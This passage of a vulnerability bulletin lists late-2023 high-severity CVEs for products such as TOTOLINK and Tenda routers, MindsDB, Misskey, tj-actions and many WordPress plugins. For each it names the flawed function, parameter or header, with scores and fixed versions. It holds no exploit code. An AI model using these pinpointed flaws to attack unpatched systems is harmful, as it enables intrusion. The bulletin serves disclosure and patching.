lychee — lychee Lychee is a free photo-management tool. Prior to 5.0.2, Lychee is vulnerable to an SQL injection on any binding when using mysql/mariadb. This injection is only active for users with the `.env` settings set to DB_LOG_SQL=true and DB_LOG_SQL_EXPLAIN=true. The defaults settings of Lychee are safe. The patch is provided on version 5.0.2. To work around this issue, disable SQL EXPLAIN logging. 2023-12-28 8.8 CVE-2023-52082
security-advisories@github.com
mattermost — mattermost Mattermost version 2.10.0 and earlier fails to sanitize deeplink paths, which allows an attacker to perform CSRF attacks against the server. 2023-12-29 7.1 CVE-2023-7114
responsibledisclosure@mattermost.com
micropython — micropython A vulnerability was found in MicroPython up to 1.21.0. It has been classified as critical. Affected is the function slice_indices of the file objslice.c. The manipulation leads to heap-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.22.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-249180. 2023-12-29 7.3 CVE-2023-7158
cna@vuldb.com
microsoft — visual_studio Visual Studio Code Python Extension Remote Code Execution Vulnerability 2023-12-29 7.8 CVE-2020-17163
secure@microsoft.com
mindsdb — mindsdb MindsDB is a SQL Server for artificial intelligence. Prior to version 23.11.4.1, the `put` method in `mindsdb/mindsdb/api/http/namespaces/file.py` does not validate the user-controlled name value, which is used in a temporary file name, which is afterwards opened for writing on lines 122-125, which leads to path injection. Later in the method, the temporary directory is deleted on line 151, but since we can write outside of the directory using the path injection vulnerability, the potentially dangerous file is not deleted. Arbitrary file contents can be written due to `f.write(chunk)` on line 125. Mindsdb does check later on line 149 in the `save_file` method in `file-controller.py` which calls the `_handle_source` method in `file_handler.py` if a file is of one of the types `csv`, `json`, `parquet`, `xls`, or `xlsx`. However, since the check happens after the file has already been written, the files will still exist (and will not be removed due to the path injection described earlier), just the `_handle_source` method will return an error. The same user-controlled source is used also in another path injection sink on line 138. This leads to another path injection, which allows an attacker to delete any `zip` or `tar.gz` files on the server. 2023-12-22 9.1 CVE-2023-50731
security-advisories@github.com
misskey — misskey Misskey is an open source, decentralized social media platform. Third-party applications may be able to access some endpoints or Websocket APIs that are incorrectly specified as [kind](https://github.com/misskey-dev/misskey/blob/406b4bdbe79b5b0b68fcdcb3c4b6e419460a0258/packages/backend/src/server/api/endpoints.ts#L811) or [secure](https://github.com/misskey-dev/misskey/blob/406b4bdbe79b5b0b68fcdcb3c4b6e419460a0258/packages/backend/src/server/api/endpoints.ts#L805) without the user’s permission and perform operations such as reading or adding non-public content. As a result, if the user who authenticated the application is an administrator, confidential information such as object storage secret keys and SMTP server passwords will be leaked, and general users can also create invitation codes without permission and leak non-public user information. This is patched in version [2023.12.1](https://github.com/misskey-dev/misskey/commit/c96bc36fedc804dc840ea791a9355d7df0748e64). 2023-12-29 9 CVE-2023-52139
security-advisories@github.com
misskey — misskey Nexkey is a lightweight fork of Misskey v12 optimized for small to medium size servers. Prior to 12.23Q4.5, Nexkey allows external apps using tokens issued by administrators and moderators to call admin APIs. This allows malicious third-party apps to perform operations such as updating server settings, as well as compromise object storage and email server credentials. This issue has been patched in 12.23Q4.5. 2023-12-27 8.9 CVE-2023-52077
security-advisories@github.com
moxa — iologik_e1210_firmware A Cross-Site Request Forgery (CSRF) vulnerability has been identified in ioLogik E1200 Series firmware versions v3.3 and prior. An attacker can exploit this vulnerability to trick a client into making an unintentional request to the web server, which will be treated as an authentic request. This vulnerability may lead an attacker to perform operations on behalf of the victimized user. 2023-12-23 8.8 CVE-2023-5961
psirt@moxa.com
mp3gain — mp3gain A stack buffer overflow vulnerability in MP3Gain v1.6.2 allows an attacker to cause a denial of service via the WriteMP3GainAPETag function at apetag.c:592. 2023-12-22 7.5 CVE-2023-49356
cve@mitre.org
netentsec — ns-asg_application_security_gateway A vulnerability classified as critical has been found in Netentsec NS-ASG Application Security Gateway 6.3.1. This affects an unknown part of the file index.php?para=index of the component Login. The manipulation of the argument check_VirtualSiteId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249183. 2023-12-29 7.3 CVE-2023-7161
cna@vuldb.com
open_design_alliance — oda_drawings_sdk An issue was discovered in Open Design Alliance Drawings SDK before 2024.12. A corrupted value of number of sectors used by the Fat structure in a crafted DGN file leads to an out-of-bounds write. An attacker can leverage this vulnerability to execute code in the context of the current process. 2023-12-26 7.8 CVE-2023-5180
8a9629cb-c5e7-4d2a-a894-111e8039b7ea
pandora_fms — pandora_fms Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Pandora FMS on all allows Cross-Site Scripting (XSS). Malicious code could be executed in the File Manager section. This issue affects Pandora FMS: from 700 through 774. 2023-12-29 7.5 CVE-2023-41815
security@pandorafms.com
pexip — pexip_infinity Pexip Infinity before 31.2 has Improper Input Validation for signalling, allowing remote attackers to trigger an abort. 2023-12-25 7.5 CVE-2023-31289
cve@mitre.org
pexip — pexip_infinity Pexip Infinity before 31.2 has Improper Input Validation for RTCP, allowing remote attackers to trigger an abort. 2023-12-25 7.5 CVE-2023-31455
cve@mitre.org
phpgurukul — hospital_management_system A vulnerability, which was classified as critical, has been found in PHPGurukul Hospital Management System 1.0. Affected by this issue is some unknown functionality of the component Admin Dashboard. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249356. 2023-12-30 7.3 CVE-2023-7172
cna@vuldb.com
phpgurukul — nipah_virus_testing_management_system A vulnerability, which was classified as critical, has been found in PHPGurukul Nipah Virus Testing Management System 1.0. This issue affects some unknown processing of the file bwdates-report-result.php. The manipulation of the argument fromdate leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248951. 2023-12-25 9.8 CVE-2023-7099
cna@vuldb.com
phpgurukul — online_notes_sharing_system A vulnerability was found in PHPGurukul Online Notes Sharing System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /user/signup.php. The manipulation leads to weak password requirements. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248740. 2023-12-22 8.8 CVE-2023-7053
cna@vuldb.com
phpgurukul — restaurant_table_booking_system A vulnerability, which was classified as critical, was found in PHPGurukul Restaurant Table Booking System 1.0. Affected is an unknown function of the file /admin/bwdates-report-details.php. The manipulation of the argument fdate leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248952. 2023-12-25 9.8 CVE-2023-7100
cna@vuldb.com
poly — multiple_products A vulnerability, which was classified as critical, has been found in Poly CCX 400, CCX 600, Trio 8800 and Trio C60. This issue affects some unknown processing of the component Diagnostic Telnet Mode. The manipulation leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component. The identifier VDB-249257 was assigned to this vulnerability. 2023-12-29 7.2 CVE-2023-4464
cna@vuldb.com
red_hat — jboss_enterprise_application_platform A flaw was found in EAP-7 during deserialization of certain classes, which permits instantiation of HashMap and HashTable with no checks on resources consumed. This issue could allow an attacker to submit malicious requests using these classes, which could eventually exhaust the heap and result in a Denial of Service. 2023-12-27 7.5 CVE-2023-3171
secalert@redhat.com
revanced — revanced ReVanced API proxies requests needed to feed the ReVanced Manager and website with data. Up to and including commit 71f81f7f20cd26fd707335bca9838fa3e7df20d2, ReVanced API lacks error caching causing rate limit to be triggered thus increasing server load. This causes a denial of service for all users using the API. It is recommended to implement proper error caching. 2023-12-27 7.5 CVE-2023-52075
security-advisories@github.com
signalwire — freeswitch FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.11, when handling DTLS-SRTP for media setup, FreeSWITCH is susceptible to Denial of Service due to a race condition in the hello handshake phase of the DTLS protocol. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. If an attacker manages to send a ClientHello DTLS message with an invalid CipherSuite (such as `TLS_NULL_WITH_NULL_NULL`) to the port on the FreeSWITCH server that is expecting packets from the caller, a DTLS error is generated. This results in the media session being torn down, which is followed by teardown at signaling (SIP) level too. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable FreeSWITCH servers for calls that rely on DTLS-SRTP. To address this vulnerability, upgrade FreeSWITCH to 1.10.11 which includes the security fix. The solution implemented is to drop all packets from addresses that have not been validated by an ICE check. 2023-12-27 7.5 CVE-2023-51443
security-advisories@github.com
sourcecodester — simple_student_attendance_system A vulnerability was found in SourceCodester Simple Student Attendance System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality. The manipulation of the argument page leads to path traversal: ‘../filedir’. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248749 was assigned to this vulnerability. 2023-12-22 9.8 CVE-2023-7058
cna@vuldb.com
talent_software — ecop Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Talent Software ECOP allows Command Line Execution through SQL Injection. This issue affects ECOP: before 32255. 2023-12-28 7.5 CVE-2023-4671
iletisim@usom.gov.tr
tenda — m3_firmware Tenda M3 V1.0.0.12(4856) was discovered to contain a stack overflow via the function formGetWeiXinConfig. 2023-12-26 9.8 CVE-2023-51090
cve@mitre.org
tenda — m3_firmware Tenda M3 V1.0.0.12(4856) was discovered to contain a stack overflow via the function R7WebsSecurityHandler. 2023-12-26 9.8 CVE-2023-51091
cve@mitre.org
tenda — m3_firmware Tenda M3 V1.0.0.12(4856) was discovered to contain a stack overflow via the function upgrade. 2023-12-26 9.8 CVE-2023-51092
cve@mitre.org
tenda — m3_firmware Tenda M3 V1.0.0.12(4856) was discovered to contain a stack overflow via the function fromSetLocalVlanInfo. 2023-12-26 9.8 CVE-2023-51093
cve@mitre.org
tenda — m3_firmware Tenda M3 V1.0.0.12(4856) was discovered to contain a Command Execution vulnerability via the function TendaTelnet. 2023-12-26 9.8 CVE-2023-51094
cve@mitre.org
tenda — m3_firmware Tenda M3 V1.0.0.12(4856) was discovered to contain a stack overflow via the function formDelWlRfPolicy. 2023-12-26 9.8 CVE-2023-51095
cve@mitre.org
tenda — w9_firmware Tenda W9 V1.0.0.7(4456)_CN was discovered to contain a stack overflow via the function formSetAutoPing. 2023-12-26 9.8 CVE-2023-51097
cve@mitre.org
tenda — w9_firmware Tenda W9 V1.0.0.7(4456)_CN was discovered to contain a command injection vulnerability via the function formSetDiagnoseInfo. 2023-12-26 9.8 CVE-2023-51098
cve@mitre.org
tenda — w9_firmware Tenda W9 V1.0.0.7(4456)_CN was discovered to contain a command injection vulnerability via the function formexeCommand. 2023-12-26 9.8 CVE-2023-51099
cve@mitre.org
tenda — w9_firmware Tenda W9 V1.0.0.7(4456)_CN was discovered to contain a command injection vulnerability via the function formGetDiagnoseInfo. 2023-12-26 9.8 CVE-2023-51100
cve@mitre.org
tenda — w9_firmware Tenda W9 V1.0.0.7(4456)_CN was discovered to contain a stack overflow via the function formSetUplinkInfo. 2023-12-26 9.8 CVE-2023-51101
cve@mitre.org
tenda — w9_firmware Tenda W9 V1.0.0.7(4456)_CN was discovered to contain a stack overflow via the function formWifiMacFilterSet. 2023-12-26 9.8 CVE-2023-51102
cve@mitre.org
tj-actions — tj-actions tj-actions/changed-files is a Github action to retrieve all files and directories. Prior to 41.0.0, the `tj-actions/changed-files` workflow allows for command injection in changed filenames, allowing an attacker to execute arbitrary code and potentially leak secrets. This issue may lead to arbitrary command execution in the GitHub Runner. This vulnerability has been addressed in version 41.0.0. Users are advised to upgrade. 2023-12-27 7.3 CVE-2023-51664
security-advisories@github.com
tj-actions — tj-actions The [`tj-actions/verify-changed-files`](https://github.com/tj-actions/verify-changed-files) action allows for command injection in changed filenames, allowing an attacker to execute arbitrary code and potentially leak secrets. The [`verify-changed-files`](https://github.com/tj-actions/verify-changed-files) workflow returns the list of files changed within a workflow execution. This could potentially allow filenames that contain special characters such as `;` which can be used by an attacker to take over the [GitHub Runner](https://docs.github.com/en/actions/using-github-hosted-runners/about-github-hosted-runners) if the output value is used in a raw fashion (thus being directly replaced before execution) inside a `run` block. By running custom commands, an attacker may be able to steal secrets such as `GITHUB_TOKEN` if triggered on other events than `pull_request`. This has been patched in versions [17](https://github.com/tj-actions/verify-changed-files/releases/tag/v17) and [17.0.0](https://github.com/tj-actions/verify-changed-files/releases/tag/v17.0.0) by enabling `safe_output` by default and returning filename paths escaping special characters for bash environments. 2023-12-29 7.7 CVE-2023-52137
security-advisories@github.com
totolink — a3700r_firmware There is an arbitrary command execution vulnerability in the setDiagnosisCfg function of the cstecgi.cgi of the TOTOlink A3700R router device in its firmware version V9.1.2u.5822_B20200513. 2023-12-22 9.8 CVE-2023-50147
cve@mitre.org
totolink — a7100ru A vulnerability, which was classified as critical, has been found in Totolink A7100RU 7.4cu.2313_B20191024. Affected by this issue is the function main of the file /cgi-bin/cstecgi.cgi?action=login of the component HTTP POST Request Handler. The manipulation of the argument flag leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248942 is the identifier assigned to this vulnerability. 2023-12-25 9.8 CVE-2023-7095
cna@vuldb.com
totolink — ex1200l_firmware TOTOlink EX1200L V9.3.5u.6146_B20201023 is vulnerable to arbitrary command execution via the cstecgi.cgi setOpModeCfg interface. 2023-12-22 9.8 CVE-2023-51033
cve@mitre.org
totolink — ex1800t_firmware TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the lanPriDns parameter of the setLanConfig interface of the cstecgi.cgi. 2023-12-22 9.8 CVE-2023-51011
cve@mitre.org
totolink — ex1800t_firmware TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the lanGateway parameter of the setLanConfig interface of the cstecgi.cgi. 2023-12-22 9.8 CVE-2023-51012
cve@mitre.org
totolink — ex1800t_firmware TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the lanNetmask parameter of the setLanConfig interface of the cstecgi.cgi. 2023-12-22 9.8 CVE-2023-51013
cve@mitre.org
totolink — ex1800t_firmware TOTOLINK EX1800T V9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the lanSecDns parameter of the setLanConfig interface of the cstecgi.cgi. 2023-12-22 9.8 CVE-2023-51014
cve@mitre.org
totolink — ex1800t_firmware TOTOLINK EX1800T v9.1.0cu.2112_B20220316 is vulnerable to arbitrary command execution in the ‘enable parameter’ of the setDmzCfg interface of the cstecgi.cgi. 2023-12-22 9.8 CVE-2023-51015
cve@mitre.org
totolink — ex1800t_firmware TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the setRebootScheCfg interface of the cstecgi.cgi. 2023-12-22 9.8 CVE-2023-51016
cve@mitre.org
totolink — ex1800t_firmware TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the lanIp parameter of the setLanConfig interface of the cstecgi.cgi. 2023-12-22 9.8 CVE-2023-51017
cve@mitre.org
totolink — ex1800t_firmware TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘opmode’ parameter of the setWiFiApConfig interface of the cstecgi.cgi. 2023-12-22 9.8 CVE-2023-51018
cve@mitre.org
totolink — ex1800t_firmware TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘key5g’ parameter of the setWiFiExtenderConfig interface of the cstecgi.cgi. 2023-12-22 9.8 CVE-2023-51019
cve@mitre.org
totolink — ex1800t_firmware TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘langType’ parameter of the setLanguageCfg interface of the cstecgi.cgi. 2023-12-22 9.8 CVE-2023-51020
cve@mitre.org
totolink — ex1800t_firmware TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘merge’ parameter of the setRptWizardCfg interface of the cstecgi.cgi. 2023-12-22 9.8 CVE-2023-51021
cve@mitre.org
totolink — ex1800t_firmware TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘langFlag’ parameter of the setLanguageCfg interface of the cstecgi.cgi. 2023-12-22 9.8 CVE-2023-51022
cve@mitre.org
totolink — ex1800t_firmware TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to arbitrary command execution in the ‘host_time’ parameter of the NTPSyncWithHost interface of the cstecgi.cgi. 2023-12-22 9.8 CVE-2023-51023
cve@mitre.org
totolink — ex1800t_firmware TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘tz’ parameter of the setNtpCfg interface of the cstecgi.cgi. 2023-12-22 9.8 CVE-2023-51024
cve@mitre.org
totolink — ex1800t_firmware TOTOlink EX1800T V9.1.0cu.2112_B20220316 is vulnerable to an unauthorized arbitrary command execution in the ‘admuser’ parameter of the setPasswordCfg interface of the cstecgi.cgi. 2023-12-22 9.8 CVE-2023-51025
cve@mitre.org
totolink — ex1800t_firmware TOTOlink EX1800T V9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘hour’ parameter of the setRebootScheCfg interface of the cstecgi.cgi. 2023-12-22 9.8 CVE-2023-51026
cve@mitre.org
totolink — ex1800t_firmware TOTOlink EX1800T V9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘apcliAuthMode’ parameter of the setWiFiExtenderConfig interface of the cstecgi.cgi. 2023-12-22 9.8 CVE-2023-51027
cve@mitre.org
totolink — ex1800t_firmware TOTOLINK EX1800T 9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the apcliChannel parameter of the setWiFiExtenderConfig interface of the cstecgi.cgi. 2023-12-22 9.8 CVE-2023-51028
cve@mitre.org
wasmer — wasmer Wasmer is a WebAssembly runtime that enables containers to run anywhere: from Desktop to the Cloud, Edge and even the browser. Wasm programs can access the filesystem outside of the sandbox. Service providers running untrusted Wasm code on Wasmer can unexpectedly expose the host filesystem. This vulnerability has been patched in version 4.2.4. 2023-12-22 8.4 CVE-2023-51661
security-advisories@github.com
ween_software — admin_panel Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Ween Software Admin Panel allows SQL Injection. This issue affects Admin Panel: through 20231229.  NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-29 9.8 CVE-2023-4541
iletisim@usom.gov.tr
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in David F. Carr RSVPMaker. This issue affects RSVPMaker: from n/a through 10.6.6. 2023-12-29 10 CVE-2023-25054
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Shabti Kaplan Frontend Admin by DynamiApps. This issue affects Frontend Admin by DynamiApps: from n/a through 3.18.3. 2023-12-29 10 CVE-2023-51411
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Bertha.Ai BERTHA AI. Your AI co-pilot for WordPress and Chrome. This issue affects BERTHA AI. Your AI co-pilot for WordPress and Chrome: from n/a through 1.11.10.7. 2023-12-29 10 CVE-2023-51419
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Jacques Malgrange Rencontre – Dating Site. This issue affects Rencontre – Dating Site: from n/a through 3.10.1. 2023-12-29 10 CVE-2023-51468
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Pixelemu TerraClassifieds – Simple Classifieds Plugin. This issue affects TerraClassifieds – Simple Classifieds Plugin: from n/a through 2.0.3. 2023-12-29 10 CVE-2023-51473
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in IOSS WP MLM SOFTWARE PLUGIN. This issue affects WP MLM SOFTWARE PLUGIN: from n/a through 4.0. 2023-12-29 10 CVE-2023-51475
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in realmag777 Active Products Tables for WooCommerce. Professional products tables for WooCommerce store. This issue affects Active Products Tables for WooCommerce. Professional products tables for WooCommerce store: from n/a through 1.0.6. 2023-12-29 10 CVE-2023-51505
audit@patchstack.com
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in Milan Dinić Rename Media Files. This issue affects Rename Media Files: from n/a through 1.0.1. 2023-12-29 9.9 CVE-2023-32095
audit@patchstack.com
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in Kanban for WordPress Kanban Boards for WordPress. This issue affects Kanban Boards for WordPress: from n/a through 2.5.21. 2023-12-29 9.1 CVE-2023-40606
audit@patchstack.com
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in POSIMYTH Nexter Extension. This issue affects Nexter Extension: from n/a through 2.0.3. 2023-12-29 9.1 CVE-2023-45751
audit@patchstack.com
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in TienCOP WP EXtra. This issue affects WP EXtra: from n/a through 6.2. 2023-12-29 9.9 CVE-2023-46623
audit@patchstack.com
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in Qode Interactive Qode Essential Addons. This issue affects Qode Essential Addons: from n/a through 1.5.2. 2023-12-29 9.9 CVE-2023-47840
audit@patchstack.com
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in Brainstorm Force Astra Pro. This issue affects Astra Pro: from n/a through 4.3.1. 2023-12-29 9.9 CVE-2023-49830
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in JS Help Desk JS Help Desk – Best Help Desk & Support Plugin. This issue affects JS Help Desk – Best Help Desk & Support Plugin: from n/a through 2.8.1. 2023-12-28 9.3 CVE-2023-50839
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in WPVibes WP Mail Log. This issue affects WP Mail Log: from n/a through 1.1.2. 2023-12-29 9.9 CVE-2023-51410
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Piotnet Piotnet Forms. This issue affects Piotnet Forms: from n/a through 1.0.25. 2023-12-29 9 CVE-2023-51412
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in EnvialoSimple EnvíaloSimple: Email Marketing y Newsletters. This issue affects EnvíaloSimple: Email Marketing y Newsletters: from n/a through 2.1. 2023-12-29 9.6 CVE-2023-51414
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Joris van Montfort JVM Gutenberg Rich Text Icons. This issue affects JVM Gutenberg Rich Text Icons: from n/a through 1.2.3. 2023-12-29 9.9 CVE-2023-51417
audit@patchstack.com
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in Soft8Soft LLC Verge3D Publishing and E-Commerce. This issue affects Verge3D Publishing and E-Commerce: from n/a through 4.5.2. 2023-12-29 9.1 CVE-2023-51420
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Soft8Soft LLC Verge3D Publishing and E-Commerce. This issue affects Verge3D Publishing and E-Commerce: from n/a through 4.5.2. 2023-12-29 9.9 CVE-2023-51421
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in Saleswonder Team Webinar Plugin: Create live/evergreen/automated/instant webinars, stream & Zoom Meetings | WebinarIgnition. This issue affects Webinar Plugin: Create live/evergreen/automated/instant webinars, stream & Zoom Meetings | WebinarIgnition: from n/a through 3.05.0. 2023-12-29 9.9 CVE-2023-51422
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in Jacques Malgrange Rencontre – Dating Site. This issue affects Rencontre – Dating Site: from n/a through 3.11.1. 2023-12-29 9.9 CVE-2023-51470
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF), Deserialization of Untrusted Data vulnerability in ThemeHigh Job Manager & Career – Manage job board listings, and recruitments. This issue affects Job Manager & Career – Manage job board listings, and recruitments: from n/a through 1.4.4. 2023-12-29 9.6 CVE-2023-51545
audit@patchstack.com
wordpress — wordpress The Backup Migration plugin for WordPress is vulnerable to Remote File Inclusion in versions 1.0.8 to 1.3.9 via the ‘content-dir’ HTTP header. This makes it possible for unauthenticated attackers to include remote files on the server, resulting in code execution. NOTE: Successful exploitation of this vulnerability requires that the target server’s php.ini is configured with ‘allow_url_include’ set to ‘on’. This feature is deprecated as of PHP 7.4 and is disabled by default, but can still be explicitly enabled in later versions of PHP. 2023-12-23 9.8 CVE-2023-6971
security@wordfence.com
wordpress — wordpress The Backup Migration plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.3.9 via the ‘content-backups’ and ‘content-name’, ‘content-manifest’, or ‘content-bmitmp’ and ‘content-identy’ HTTP headers. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible. 2023-12-23 9.8 CVE-2023-6972
security@wordfence.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in miniOrange miniOrange’s Google Authenticator – WordPress Two Factor Authentication – 2FA, Two Factor, OTP SMS and Email | Passwordless login. This issue affects miniOrange’s Google Authenticator – WordPress Two Factor Authentication – 2FA, Two Factor, OTP SMS and Email | Passwordless login: from n/a through 5.6.1. 2023-12-29 8.1 CVE-2022-44589
audit@patchstack.com
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in BinaryStash WP Booklet. This issue affects WP Booklet: from n/a through 2.1.8. 2023-12-29 8.5 CVE-2023-22677
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in WooCommerce Product Add-Ons. This issue affects Product Add-Ons: from n/a through 6.1.3. 2023-12-28 8.2 CVE-2023-32795
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in wpdevelop, oplugins Booking Manager. This issue affects Booking Manager: from n/a through 2.1.5. 2023-12-28 8.5 CVE-2023-50840
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Repute Infosystems BookingPress – Appointment Booking Calendar Plugin and Online Scheduling Plugin. This issue affects BookingPress – Appointment Booking Calendar Plugin and Online Scheduling Plugin: from n/a through 1.0.72. 2023-12-28 8.5 CVE-2023-50841
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Matthew Fries MF Gig Calendar. This issue affects MF Gig Calendar: from n/a through 1.2.1. 2023-12-28 8.5 CVE-2023-50842
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in GiveWP GiveWP – Donation Plugin and Fundraising Platform. This issue affects GiveWP – Donation Plugin and Fundraising Platform: from n/a through 2.25.3. 2023-12-28 7.5 CVE-2023-32513
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WebFactory Ltd Login Lockdown – Protect Login Form. This issue affects Login Lockdown – Protect Login Form: from n/a through 2.06. 2023-12-29 7.6 CVE-2023-50837
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Basix NEX-Forms – Ultimate Form Builder – Contact forms and much more. This issue affects NEX-Forms – Ultimate Form Builder – Contact forms and much more: from n/a through 8.5.5. 2023-12-28 7.6 CVE-2023-50838
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Clockwork Clockwork SMS Notifications. This issue affects Clockwork SMS Notifications: from n/a through 3.0.4. 2023-12-28 7.6 CVE-2023-50843
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in James Ward Mail logging – WP Mail Catcher. This issue affects Mail logging – WP Mail Catcher: from n/a through 2.1.3. 2023-12-28 7.6 CVE-2023-50844
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in AyeCode – WordPress Business Directory Plugins GeoDirectory – WordPress Business Directory Plugin, or Classified Directory. This issue affects GeoDirectory – WordPress Business Directory Plugin, or Classified Directory: from n/a through 2.3.28. 2023-12-28 7.6 CVE-2023-50845
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in RegistrationMagic RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login. This issue affects RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login: from n/a through 5.2.4.5. 2023-12-28 7.6 CVE-2023-50846
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Collne Inc. Welcart e-Commerce. This issue affects Welcart e-Commerce: from n/a through 2.9.3. 2023-12-28 7.6 CVE-2023-50847
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Aaron J 404 Solution. This issue affects 404 Solution: from n/a through 2.34.0. 2023-12-28 7.6 CVE-2023-50848
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in E2Pdf.Com E2Pdf – Export To Pdf Tool for WordPress. This issue affects E2Pdf – Export To Pdf Tool for WordPress: from n/a through 1.20.23. 2023-12-28 7.6 CVE-2023-50849
audit@patchstack.com
